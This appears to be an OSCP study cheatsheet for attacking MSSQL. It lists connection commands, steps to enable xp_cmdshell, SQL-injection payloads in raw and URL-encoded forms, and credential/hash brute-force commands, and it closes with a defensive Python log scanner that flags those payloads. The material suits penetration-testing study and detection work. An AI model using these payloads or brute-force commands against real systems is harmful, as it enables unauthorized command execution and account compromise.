OSCP Cheatsheet

TCP: MSSQL - 1433

Initial Connection

Connect on local machine

sqsh -S <Target IP Address> -U .\\<Username> -P <Password> -D <Database Name>

OR

impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -local-auth

Connect to machine

sqsh -S <Target IP Address> -U <Username> -P "<Password>"

OR

impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -windows-auth

Reverse Shell

On Machine

  1. Initiate connection

If using sqsh, "GO" needs to be entered on its own line after every query to send it

  2. Use the master database

Use master

  3. List who has been granted permissions on xp_cmdshell

EXEC sp_helprotect 'xp_cmdshell'

  4. Check if xp_cmdshell is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

  5. Enable advanced options, required before xp_cmdshell can be toggled

sp_configure 'show advanced options', '1'

  6. Apply changes

RECONFIGURE

  7. Enable xp_cmdshell

sp_configure 'xp_cmdshell', '1'

  8. Apply changes

RECONFIGURE

  9. Run command

EXEC xp_cmdshell '<Command to execute>'

On SQLi vulnerability

  1. Enable advanced options, required before xp_cmdshell can be toggled

'; EXEC sp_configure "show advanced options", 1; -- //

  2. Apply changes

'; RECONFIGURE -- //

  3. Enable xp_cmdshell

'; EXEC sp_configure "xp_cmdshell", 1; -- //

  4. Apply changes

'; RECONFIGURE -- //

  5. Run commands

'; EXEC xp_cmdshell "<Command to execute>"; -- //

One Liner

Raw:

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "<Command to execute>"; -- //

URL Encoded:

%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22<Command to execute>%22%3B%20%2D%2D%20%2F%2F
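
From the defender's side, as an added example that is not part of the cheatsheet: a small Python scanner that percent-decodes the query string of each request in constructed web-server log lines (decoding until stable, so double-encoded payloads unwrap too) and flags requests whose decoded query executes or enables xp_cmdshell, which catches the one-liner above in either of its encodings. The sample log lines, rule names and function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Lines 2 and 3 carry the
# URL-encoded xp_cmdshell payload shapes from this page; lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=laptops HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /search?q=%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22%3CCommand%20to%20execute%3E%22%3B%20%2D%2D%20%2F%2F HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /search?q=%27%3B+EXEC+xp_cmdshell+%22%3CCommand+to+execute%3E%22%3B+--+%2F%2F HTTP/1.1" 500 0
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /docs?topic=xp_cmdshell+hardening HTTP/1.1" 200 2048
"""

# Patterns are matched against the fully decoded, lower-cased query string.
RULES = {
    "exec_xp_cmdshell": re.compile(r"\bexec(?:ute)?\s+(?:master\s*\.\s*(?:dbo\s*\.)?\s*)?xp_cmdshell\b"),
    "enable_xp_cmdshell": re.compile(r"\bsp_configure\b[^;]*\bxp_cmdshell\b"),
    "show_advanced_options": re.compile(r"\bsp_configure\b[^;]*\bshow\s+advanced\s+options\b"),
    "reconfigure": re.compile(r"\breconfigure\b"),
    "quote_stacked_query": re.compile(r"'\s*;"),
}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_query(target: str) -> str:
    """Query string of a request target, percent-decoded until stable."""
    # Repeating the decode also unwraps double-encoded payloads; '+' becomes a space.
    query = target.partition("?")[2]
    previous = None
    while query != previous:
        previous, query = query, unquote_plus(query)
    return query.lower()


def scan_log(text: str) -> list:
    """One finding per request whose decoded query shows xp_cmdshell abuse."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line in the expected shape
        decoded = decode_query(match.group("target"))
        hits = [name for name, rx in RULES.items() if rx.search(decoded)]
        # Executing or enabling xp_cmdshell is a positive on its own; the other
        # rules (stacked query, RECONFIGURE) are kept as supporting context.
        if "exec_xp_cmdshell" in hits or "enable_xp_cmdshell" in hits:
            findings.append({"client": line.split()[0], "rules": hits, "decoded": decoded})
    return findings
```

A benign mention of xp_cmdshell in a query (line 4 of the sample) is not flagged, since neither an EXEC nor an sp_configure call accompanies it.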

Bruteforce

nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success
nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -H <Hash List> --continue-on-success